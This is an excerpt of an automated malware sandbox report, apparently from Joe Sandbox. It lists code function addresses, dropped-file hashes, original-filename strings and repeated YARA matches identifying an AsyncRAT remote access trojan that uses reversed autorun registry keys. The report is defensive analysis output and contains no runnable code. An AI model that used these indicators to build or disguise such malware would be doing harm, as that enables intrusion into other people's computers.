Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01454F68 33_2_01454F68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAA7B0 33_2_05BAA7B0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC128 33_2_05BAC128
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BABA48 33_2_05BABA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC5F8 33_2_05BAC5F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC5E8 33_2_05BAC5E8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA4D70 33_2_05BA4D70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAC98 33_2_05BAAC98
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAC92 33_2_05BAAC92
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7488 33_2_05BA7488
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA4C8F 33_2_05BA4C8F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7479 33_2_05BA7479
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA6C68 33_2_05BA6C68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA6C62 33_2_05BA6C62
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3460 33_2_05BA3460
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3451 33_2_05BA3451
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2C40 33_2_05BA2C40
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAA730 33_2_05BAA730
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAA752 33_2_05BAA752
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAEF0 33_2_05BAAEF0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAEE2 33_2_05BAAEE2
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA5E18 33_2_05BA5E18
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA5E08 33_2_05BA5E08
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3E60 33_2_05BA3E60
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7658 33_2_05BA7658
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA3E5E 33_2_05BA3E5E
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7652 33_2_05BA7652
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA71F8 33_2_05BA71F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA71E9 33_2_05BA71E9
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAC123 33_2_05BAC123
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2160 33_2_05BA2160
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2150 33_2_05BA2150
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7088 33_2_05BA7088
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA7078 33_2_05BA7078
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BA2BA8 33_2_05BA2BA8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAA38 33_2_05BAAA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BABA3F 33_2_05BABA3F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_05BAAA48 33_2_05BAAA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0141D304 37_2_0141D304
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DA7B0 37_2_072DA7B0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3E60 37_2_072D3E60
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D4D70 37_2_072D4D70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2C40 37_2_072D2C40
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DBA48 37_2_072DBA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC128 37_2_072DC128
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DA730 37_2_072DA730
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DA75A 37_2_072DA75A
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D5E08 37_2_072D5E08
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D5E18 37_2_072D5E18
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3E5F 37_2_072D3E5F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7658 37_2_072D7658
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7652 37_2_072D7652
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAEE2 37_2_072DAEE2
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAEF0 37_2_072DAEF0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D4D4F 37_2_072D4D4F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC5E8 37_2_072DC5E8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC5F8 37_2_072DC5F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D6C68 37_2_072D6C68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3460 37_2_072D3460
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D6C62 37_2_072D6C62
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7479 37_2_072D7479
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D4C70 37_2_072D4C70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D3451 37_2_072D3451
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7488 37_2_072D7488
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAC88 37_2_072DAC88
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAC98 37_2_072DAC98
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2BAB 37_2_072D2BAB
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DBA3F 37_2_072DBA3F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAA38 37_2_072DAA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DAA48 37_2_072DAA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072DC123 37_2_072DC123
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2160 37_2_072D2160
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D2150 37_2_072D2150
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D71E9 37_2_072D71E9
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D71F8 37_2_072D71F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7078 37_2_072D7078
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_072D7088 37_2_072D7088
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07910518 37_2_07910518
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0791A808 37_2_0791A808
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07914F68 37_2_07914F68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0791050B 37_2_0791050B
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913CC8 37_2_07913CC8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_0791341D 37_2_0791341D
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913458 37_2_07913458
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_079159D8 37_2_079159D8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913890 37_2_07913890
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 37_2_07913880 37_2_07913880
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Taskshell.exe 5A283F2F193BD78816D21CC62D0BB67A5570BC631F5C3752444ABC28515E542C
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\xcsUjVN.exe 5A283F2F193BD78816D21CC62D0BB67A5570BC631F5C3752444ABC28515E542C
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000000.1695994724.0000000000F72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameKxLf.exe4 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1754412777.00000000013FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe" vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1758132050.0000000003100000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1762564281.0000000004C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000009.00000002.1790797223.000000000040E000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe" vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe, 00000009.00000002.1797105596.0000000004084000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKxLf.exe4 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe Binary or memory string: OriginalFilenameKxLf.exe4 vs PXUVmodpCYqRIPQ.exe
Source: PXUVmodpCYqRIPQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
